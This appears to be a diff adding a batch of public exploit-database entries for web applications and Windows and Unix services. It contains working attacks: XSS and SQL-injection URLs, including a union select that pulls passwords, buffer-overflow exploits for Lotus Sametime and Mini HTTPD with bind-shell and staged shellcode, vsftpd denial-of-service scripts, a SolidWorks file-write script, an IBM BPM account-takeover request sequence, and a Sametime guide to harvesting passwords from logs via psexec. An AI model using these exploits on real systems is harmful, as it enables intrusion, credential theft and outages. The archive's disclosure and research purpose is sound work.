+http://www.example.com/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?errcontext=<XSS>
+http://www.example.com/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS> 

platforms/php/webapps/31842.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29369/info
+
+AbleSpace is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AbleSpace 1.0 is vulnerable; other versions may also be affected.
+
+Http://www.example.com/ablespace/adv_cat.php?cat_id=[sql inection] 

platforms/php/webapps/31844.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29371/info
+
+phpFix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+phpFix 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth

platforms/php/webapps/31845.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29371/info
+ 
+phpFix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+phpFix 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah%
+http://www.example.com/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% 

platforms/unix/remote/31820.pl

@@ -0,0 +1,188 @@
+source: http://www.securityfocus.com/bid/29328/info
+
+IBM Lotus Sametime is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in a denial of service. 
+
+#!perl
+#
+# "IBM Lotus Sametime" StMUX Stack Overflow Exploit
+#
+# Author:  Manuel Santamarina Suarez
+# e-Mail:  FistFuXXer@gmx.de
+#
+
+use IO::Socket;
+use File::Basename;
+
+#
+# destination TCP port
+#
+$port = 1533;
+
+#
+# SE handler
+#
+# Don't use upper-case ASCII characters or 0x00, 0x0a, 0x0b, 0x0d, 0x20
+# You MUST use a POP/POP/RET sequence that doesn't modify the ESP register
+#
+$seh = reverse( "\x7C\x34\x10\xC2" );  # POP ECX/POP ECX/RET
+                                       # msvcr71.7c3410c2
+                                       # universal
+
+#
+# Shellcode
+#
+# Win32 Bind Shellcode (EXITFUNC=process, LPORT=4444)
+#
+$sc = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
+      "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
+      "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
+      "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
+      "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
+      "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
+      "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
+      "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
+      "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
+      "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
+      "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
+      "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
+      "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
+      "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
+      "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
+      "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
+      "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
+      "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
+      "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
+      "\x52\xff\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0";
+
+#
+# JUMP to 'ESP adjustment' and shellcode
+#
+$jmp = "\x74\x23".  # JE SHORT
+       "\x75\x21";  # JNZ SHORT
+
+
+#
+#
+# Don't edit anything after this line
+#
+#
+
+
+sub usage {
+    print "Usage: " . basename( $0 ) . " [target] [IPv4 address]\n".
+          "Example: ". basename( $0 ) . " 1 192.168.1.32\n".
+          "\n".
+          "Targets:\n".
+          "[1]  Lotus Sametime 7.5 on Windows Server 2000 SP4\n".
+          "[2]  Lotus Sametime 7.5 on Windows Server 2003 SP2\n";
+    exit;
+}
+
+
+# Net::IP::ip_is_ipv4
+sub ip_is_ipv4 {
+    my $ip = shift;
+    
+    if (length($ip) < 7) {
+        return 0;
+    }
+
+    unless ($ip =~ m/^[\d\.]+$/) {
+        return 0;
+    }
+
+    if ($ip =~ m/^\./) {
+        return 0;
+    }
+
+    if ($ip =~ m/\.$/) {
+        return 0;
+    }
+
+    if ($ip =~ m/^(\d+)$/ and $1 < 256) {
+        return 1
+    }
+
+    my $n = ($ip =~ tr/\./\./);
+
+    unless ($n >= 0 and $n < 4) {
+        return 0;
+    }
+
+    if ($ip =~ m/\.\./) {
+        return 0;
+    }
+
+    foreach (split /\./, $ip) {
+        unless ($_ >= 0 and $_ < 256) {
+            return 0;
+        }
+    }
+    
+    return 1;
+}
+
+
+print "---------------------------------------------------\n".
+      ' "IBM Lotus Sametime" StMUX Stack Overflow Exploit'."\n".
+      "---------------------------------------------------\n\n";
+
+if( ($#ARGV+1) != 2 ) {
+    &usage;
+}
+
+# Windows 2000 SP4
+if( $ARGV[0] == 1 ) {
+    $popad = "\x5b" x 3 .     # POP EBX
+             "\x61" x 268 .   # POPAD
+             "\xff\x24\x24";  # JMP DWORD PTR SS:[ESP]
+}
+# Windows 2003 SP2
+elsif( $ARGV[0] == 2 ) {
+    $popad = "\x5b" x 3 .     # POP EBX
+             "\x61" x 269 .   # POPAD
+             "\xff\x24\x24";  # JMP DWORD PTR SS:[ESP]
+}
+else {
+    &usage;
+}
+    
+if( ip_is_ipv4( $ARGV[1] ) ) {
+    $ip = $ARGV[1];
+}
+else
+{
+    &usage;
+}
+
+print "[+] Connecting to $ip:$port...\n";
+
+$sock = IO::Socket::INET->new (
+    PeerAddr => $ip,
+    PeerPort => $port,
+    Proto    => 'tcp',
+    Timeout  => 2
+) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit;
+
+print "[+] Connected.\n".
+      "[+] Trying to overwrite and control the SE handler...\n";
+
+$path = "\x66" x 44 . $jmp . $seh . "\x66" x 29 . $popad;
+$sock->send (
+    "POST /CommunityCBR/CC.39.$path/\r\n".
+    "User-Agent: Sametime Community Agent\r\n".
+    "Host: $ip:1533\r\n".
+    "Content-Length: ". length( $sc ) ."\r\n".
+    "Connection: Close\r\n".
+    "Cache-Control: no-cache\r\n".
+    "\r\n".
+    $sc
+);
+
+sleep( 3 );
+close( $sock );
+
+print "[+] Done. Now check for a bind shell on $ip:4444!\n";
+

platforms/windows/dos/31818.sh

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/29322/info
+
+
+The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
+
+Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. 
+
+# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
+# service vsftpd restart
+
+$ cat > memtest.sh <<EOF
+ EOF
+#!/bin/bash
+echo USER anonymous
+echo PASS foo@bar.com
+
+while [ 1 ]; do
+        echo CWD pub
+        echo CWD ..
+done
+EOF

platforms/windows/dos/31819.pl

@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/29322/info
+ 
+ 
+The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
+ 
+Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. 
+
+#!/usr/bin/perl -w
+
+
+#######################################################################################
+#vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
+#Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
+#
+#Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
+#option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
+#
+#I tried to modify local exploit found at securityfocus such that we can remotely exloit
+#
+# Author shall not bear any responsibility
+#Author:Praveen Darshanam
+#Email:praveen[underscore]recker[at]sify.com
+#Date:07th June, 2008
+#
+#
+########################################################################################
+
+
+use Net::FTP;
+$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
+$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
+
+while(1)
+{
+#this loop runs infinitely
+
+    $ftp -> cwd();
+}
+
+$ftp->quit;
+

platforms/windows/remote/31814.py

@@ -0,0 +1,164 @@
+#!/usr/bin/python
+#
+# Title: Mini HTTPD stack buffer overflow POST exploit
+# Author: TheColonial
+# Date: 20 Feb 2013
+# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
+# Vendor Homepage: http://www.picolix.jp/
+# Version: 1.21
+# Tested on: Windows XP Professional SP3
+#
+# Description:
+# This is a slightly more weaponised version of the Mini HTTPD buffer overflow
+# written by Sumit, located here: http://www.exploit-db.com/exploits/31736/
+# I wrote this up because the existing version had a hard-coded payload and
+# didn't work on any of my XP boxes.
+#
+# The instability of the existing is down to bad chars, and the parent thread
+# killing off the child thread when the thing is still running. This exploit
+# allocates memory in a safe area, copies the payload to it, creates a new
+# thread which runs the payload and then suspends the current thread. The
+# suspending of the thread forces the parent to kill it off rather than let
+# it crash and potentially bring the process down.
+#
+# Run the script without arguments to see usage.
+
+import struct, socket, sys, subprocess
+
+# Helper function that reads the body of files off disk.
+def file_content(path):
+  with open(path, 'rb') as f:
+    return f.read()
+
+# Sent the payload in the correct format to the target host/port.
+def pwn(host, port, payload):
+  print "[*] Connecting to {0}:{1}...".format(host, port)
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.connect((host, port))
+  print "[*] Connected, sending payload {0} bytes...".format(len(payload))
+  payload = "POST /{0} HTTP/1.1\r\nHost: {1}\r\n\r\n".format(payload, host)
+  s.send(payload)
+  s.shutdown
+  s.close
+  print "[+] Payload of {0} bytes sent, hopefully your shellcode executed.".format(len(payload))
+
+# Create the part of the payload creates a thread to run the final payload in.
+def create_payload_thread(final_payload_size):
+  VirtualAlloc = struct.pack("<L", 0x7c809AE1)   # in kernel32
+  CreateThread = struct.pack("<L", 0x7c8106c7)   # in kernel32
+  SuspendThread = struct.pack("<L", 0x7c83974A)  # in kernel32
+
+  payload  = ""
+  payload += "\x83\xec\x02"   # add esp, 0x2 (aligns the stack)
+  payload += "\x89\xe6"       # mov esi, esp
+  payload += "\x83\xc6\x00"   # add esi, <some offset filled later>
+  count_offset = len(payload) - 1
+
+  # zero out ebx because we use zero a lot
+  payload += "\x31\xdb"             # xor ebx,ebx
+
+  # allocate some memory to store our shellcode in which is
+  # away from the current active area and somewhere safe
+  payload += "\x6a\x40"             # push 0x40
+  payload += "\x68\x00\x30\x00\x00" # push 0x3000
+  payload += "\x68\x00\x10\x00\x00" # push 0x1000
+  payload += "\x53"                 # push ebx
+  payload += "\xB8" + VirtualAlloc  # mov eax,<address>
+  payload += "\xff\xd0"             # call eax
+
+  # copy the payload over to the newly allocated area
+  size_bin = struct.pack("<L", final_payload_size + 4)
+  payload += "\xb9" + size_bin      # mov ecx,final_payload_size
+  payload += "\x89\xc7"             # mov edi,eax
+  payload += "\xf2\xa4"             # rep movsb
+
+  # create the thread with a starting address pointing to the
+  # allocated area of memory
+  payload += "\x53"                 # push ebx
+  payload += "\x53"                 # push ebx
+  payload += "\x53"                 # push ebx
+  payload += "\x50"                 # push eax
+  payload += "\x53"                 # push ebx
+  payload += "\x53"                 # push ebx
+  payload += "\xB8" + CreateThread  # mov eax,<address>
+  payload += "\xff\xd0"             # call eax
+
+  # We call SuspendThread on the current thread, because this
+  # forces the parent to kill it. The bonus here is that doing
+  # so prevents the thread from dying and bringing the whole
+  # process down.
+  payload += "\x4b"                 # dec ebx
+  payload += "\x4b"                 # dec ebx
+  payload += "\x53"                 # push ebx
+  payload += "\xB8" + SuspendThread # mov eax,<address>
+  payload += "\xff\xd0"             # call eax
+  payload += "\x90" * 4
+
+  # fill in the correct offset so that we point ESI to the
+  # right location at the start of the final payload
+  size = len(payload) + final_payload_size % 4
+
+  print "[*] Final stage is {0} bytes.".format(final_payload_size)
+
+  offset = struct.pack("B", size)
+
+  # write the value to the payload at the right location and return
+  return payload[0:count_offset] + offset + payload[count_offset+1:len(payload)]
+
+# Creates the first stage of the exploit which overwrite EIP to get control.
+def create_stage1():
+  eip_offset = 5412
+  jmp_esp = struct.pack("<L", 0x7e4456F7) # JMP ESP in advapi32
+
+  eip_offset2 = eip_offset + 4
+
+  payload  = ""
+  payload += "A" * eip_offset    # padding to reach EIP overwrite
+  payload += jmp_esp             # address to overwrite IP with
+  payload += "\x90"              # alignment
+  payload += "\x83\xEC\x21"      # rejig ESP
+  return payload
+
+# Create encoded shellcode from the given payload.
+def create_encoded_shellcode(payload):
+  print "[*] Input payload of {0} bytes received. Encoding...".format(len(payload))
+  params = ['msfencode', '-e', 'x86/opt_sub', '-t', 'raw',
+      'BufferRegister=ESP', 'BufferOffset=42', 'ValidCharSet=filepath']
+  encode = subprocess.Popen(params, stdout = subprocess.PIPE, stdin = subprocess.PIPE)
+  shellcode, _ = encode.communicate(payload)
+  print "[*] Shellcode of {0} bytes generated.".format(len(shellcode))
+  return shellcode
+
+print ""
+print "MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial"
+print "-----------------------------------------------------"
+print ""
+print " Note: msfencode must be in the path and Metasploit must be up to date."
+
+if len(sys.argv) != 4:
+  print ""
+  print " Usage: {0} <host> <port> <payloadfile>".format(sys.argv[0])
+  print ""
+  print "          host : IP/name of the target host."
+  print "          port : Port that the target is running on."
+  print "   payloadfile : A file with the raw payload that is to be run."
+  print "                 This should be the raw, non-encoded output of"
+  print "                 a call to msfpayload"
+  print ""
+  print "   eg. {0} 192.168.1.1 80 reverse_shell_raw.bin"
+  print ""
+else:
+  print ""
+  print "   Make sure you have your listeners running!"
+  print ""
+
+  host = sys.argv[1]
+  port = int(sys.argv[2])
+  payload_file = sys.argv[3]
+  stage1 = create_stage1()
+  final_stage = file_content(payload_file)
+  thread_payload = create_payload_thread(len(final_stage))
+  shellcode = create_encoded_shellcode(thread_payload + final_stage)
+  padding = "A" * 0x10
+  pwn(host, port, stage1 + shellcode + padding)
+

platforms/windows/remote/31831.py

@@ -0,0 +1,52 @@
+'''
+# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability
+# Date: 2-21-2014
+# Author: Mohamed Shetta
+Email: mshetta |at| live |dot| com
+# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
+# Tested on: Windows 7
+#Vulnerability type: Arbitrary File Write
+#Vulnerable file: pdmwService.exe
+#PORT: 30000
+
+
+---------------------------------------------------------------------------------------------------------
+Software Description:
+
+SolidWorks
+Workgroup PDM is a PDM tool that allows SolidWorks users operating in 
+teams of 10 members or less to work on designs concurrently. With 
+SolidWorks PDM Workgroup, designers can search, revise, and vault CAD 
+data while maintaining an accurate design history.
+
+
+---------------------------------------------------------------------------------------------------------
+Vulnerability Details:
+
+This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of SolidWorks Workgroup PDM.
+
+------------------------------------------------------------------------------------------------------------
+Disclosure timeline:
+
+12/15/2013 - Vendor notified and no response.
+2/21/2014 - Public disclosure
+'''
+
+#!/usr/bin/env python
+  
+import socket
+import struct
+import ctypes
+
+FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test
+Data="A"*1028
+FileSize=len(Data)
+FNsz=len(FileName)
+OpCode="\xD0\x07\x00\x00"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.0.4", 30000))
+s.send(OpCode)
+s.send(struct.pack("I", FNsz))
+s.send(FileName)
+s.send(struct.pack('<Q', FileSize))
+s.send(Data)

platforms/windows/webapps/31423.txt

@@ -0,0 +1,29 @@
+Exploit Title: IBM BMPS (BPM) User account reconfiguration/Privilege Escalation/Information Disclosure
+Date: 31.01.14
+Exploit Author: 0in
+Software link: http://www-03.ibm.com/software/products/en/business-process-manager-family/
+Version: 8.0.1.1 (newest versions can also be vulnerable)
+
+Vulnerability Description:
+Its possible to change some specfic values in accounts database (in my case it was LDAP) by authenticated but not privileged user, invoking setPreference action
+
+------------------------------------------------------------------------------------
+First of all, we should enumerate existing users to find administrator account.
+We should proceed following request:
+
+GET /rest/bpm/wle/v1/users?filter=*admin*&maxresult=11&assignTaskidFilter=[INT TASK ID]&namesonly=false&parts=all HTTP/1.1
+x-requested-with: XMLHttpRequest
+
+In result of this request we can get response like this:
+{"status":"200","data":{"users":[{"userID":1,"userName":"admin","fullName":"Administrator BPMS","isDisabled":false,"primaryGroup":null,"emailAddress":"admin@corpo","userPreferences":{ "Portal Default Page":"/dashboards?dashboard=%2Fteamworks%2FexecuteServiceByName%3FprocessApp%3DSCIM%26serviceName%History%2Bprocess%25C3%25B3w%26snapshot%3D4.0.0%26zResumable%3Dtrue", "Task Email Address":"admin@corpo","Task Notification":"true","LDAPDistinguishedName":"CN=bpmsadmin,OU=confidential,OU=Users,OU=RU,DC= confidential,DC= confidential,DC=corp,DC= confidential ","Locale":"ru","Alert On Assign And Run":"true"},"tasksCollaboration":null,"memberships":["Debug","admins","authors","portal_admins","process_owners","allusers","All Users_S_da7e4d23-78cb-4483-*******",[?]
+
+Ok, so now we have administrator username, in next step we should set his email or LDAPDistinguishedName to our, to invoke this, we should generate url like this:
+
+PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=Task%20Email%20Address&value=AttackerEmail@corpo HTTP/1.1
+x-requested-with: XMLHttpRequest
+
+Or just set LDAP preferences to our:
+PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=LDAPDistinguishedName&value= CN=ATTACKER_LOGIN,OU=w00tw00t,OU=Users,OU=Group,DC=my,DC=sub,DC=domain,DC=corpo HTTP/1.1
+
+
+Now attacker can receive all notifications about victim processes in his email, attacker can change victim password using ?forgotten password? option, change victim portal default page, LDAP Attributes. We have lot of other possibilities to exploit this situation it depends of BPMS service context.

platforms/windows/webapps/31760.txt

@@ -0,0 +1,90 @@
+# Exploit Title:	Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1
+# Google Dork: 		n/a
+# Date: 			18/02/2014
+# Exploit Author:	Adriano Marcio Monteiro <adrianomarciomonteiro@gmail.com>
+# Vendor Homepage: 	http://www.ibm.com/us/en/
+# Software Link: 	http://www-01.ibm.com/support/docview.wss?uid=swg24027054
+# Version: 			8.5.1
+# Tested on: 		Windows 7 SP1 x86 pt-br
+# CVE :			
+
+Lotus Sametime is an instant messaging application that includes several features such as video conferencing, phone calls, etc. .. In case of problems the Lotus Sametime provides functionality to register and trace log (Menu: Help / Support / Show Tracker). When you enable verbose logging is possible to obtain the user and the user's password (the password is in Base64), according to the procedure below. The vulnerability is in telephony.softphone.service more specifically in Source Class.Method:
+
+	com.ibm.ws.sip.stack.transport.TransportLayer
+	sendMessage
+
+Communication with the server is done via TLS, but the local content communication log is saved in clear text and the password is in base 64. Sample log:
+
+	Out Message: [172.29.1.121:62444->172.28.10.138:5081/TLS]
+	REGISTER sip:sipserver.meudominio.com.br:5081;transport=tls SIP/2.0
+	Call-ID: 0.CA3.11C8340A9391D37E@172.29.1.121
+	CSeq: 1 REGISTER
+	From: <sips:adriano.monteiro%40meudominio.com.br@sipserver.meudominio.com.br:5081>;tag=3996.696000502281
+	To: sips:adriano.monteiro%40meudominio.com.br@sipserver.meudominio.com.br:5081
+	Via: SIP/2.0/TLS 172.29.1.121:5061;branch=z9hG4bK-6283666955645770411
+	Max-Forwards: 70	
+	Contact: sip:172.29.1.121:5061;transport=tls
+	Expires: 0
+	User-Agent: Sametime-Softphone-8.5.1.20100709-0934
+	Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE, UPDATE
+	Authorization: Basic cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="
+	Content-Length: 0
+
+Using a simple script you can automate the process of getting username and password, but beyond the scope of this tutorial and I will not explain this process here. Use your imagination!
+
+PoC - Proof of Concept
+
+Find the file below:
+	“\\host.alvo\c$\Users\<usuario.alvo>\Dados de Aplicativos\Lotus\Sametime\.config\rcpinstall.properties”
+
+Add the following lines at the end of the file and save:
+	com.ibm.collaboration.realtime.internal.telephony.level=FINE
+	com.ibm.collaboration.realtime.telephony.ui.level=FINE
+	com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
+	com.ibm.collaboration.realtime.telephony.softphone.level=FINER
+	com.ibm.collaboration.realtime.telephony.core.level=FINE
+	com.ibm.collaboration.realtime.multimedia.phonegrid.level=FINE
+	com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
+	com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
+	com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
+	com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
+	com.ibm.collaboration.realtime.telephony.core.level=FINE
+	com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
+	com.ibm.collaboration.realtime.telephony.softphone.level=FINER
+	com.ibm.collaboration.realtime.internal.telephony.level=FINE
+	com.ibm.collaboration.realtime.telephony.ui.level=FINE
+	com.ibm.collaboration.realtime.multimedia.level=FINE
+	com.ibm.collaboration.realtime.internal.telephony.level=FINE
+	com.ibm.collaboration.realtime.telephony.level=FINE
+	com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
+	com.ibm.collaboration.realtime.telephony.softphone.level=FINER
+
+Restarting the process on the target host:
+	taskkill /s host.alvo /f /im sametime.exe
+	psexec –d \\host.alvo cmd.exe /c "%ProgramFiles%\IBM\Lotus\Sametime Connect\rcp\rcplauncher.exe"
+
+In the logs folder:
+	\\host.alvo\c$\Users\<usuario.alvo>\Dados de aplicativos\Lotus\Sametime\logs
+
+Access the file:
+	trace-log-0.xml
+
+Search for:
+	Basic cred=
+
+Example:
+<CommonBaseEvent creationTime="2014-02-18T11:44:53.249-03:00" globalInstanceId="ELac1d017d00014445744cd800001c7e" msg="Out Message: [172.29.1.125:58008->172.28.10.138:5081/TLS]&#xD;&#xA;REGISTER sip:server.meudominio.com.br:5081;transport=tls SIP/2.0&#xD;&#xA;Call-ID: 0.94.52A702A8618A2FE8@172.29.1.125&#xD;&#xA;CSeq: 1 REGISTER&#xD;&#xA;From:<sips:adriano.monteiro%40meudominio.com.br@server.meudominio.com.br:5081>;tag=4518.144797347828&#xD;&#xA;To: <sips:adriano.monteiro%40meudominio.com.br@server.meudominio.com.br:5081>&#xD;&#xA;Via: SIP/2.0/TLS 172.29.1.125:5061;branch=z9hG4bK-3811914127572726454&#xD;&#xA;Max-Forwards:70&#xD;&#xA;Contact: *&#xD;&#xA;Expires: 0&#xD;&#xA;User-Agent: Sametime-Softphone-8.5.1.20100709-0934&#xD;&#xA;Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE,UPDATE&#xD;&#xA;
+Authorization: Basic cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="&#xD;&#xA;Content-Length: 0&#xD;&#xA;&#xD;&#xA;" 	severity="10" version="1.0.1">
+
+The username and password found here:
+	Authorization: Basic cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="
+
+Getting Username and Password:
+	http://www.base64decode.org/
+	Decode:		YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==
+	Result:		adriano.monteiro@meudominio.com.br:Amor1010
+
+Bibliography:
+http://pic.dhe.ibm.com/infocenter/sametime/v8r5/index.jsp?topic=%2Fcom.ibm.help.sametime.v85.doc%2Ftrouble%2Ftrbl_client_log_trace.html
+
+[end]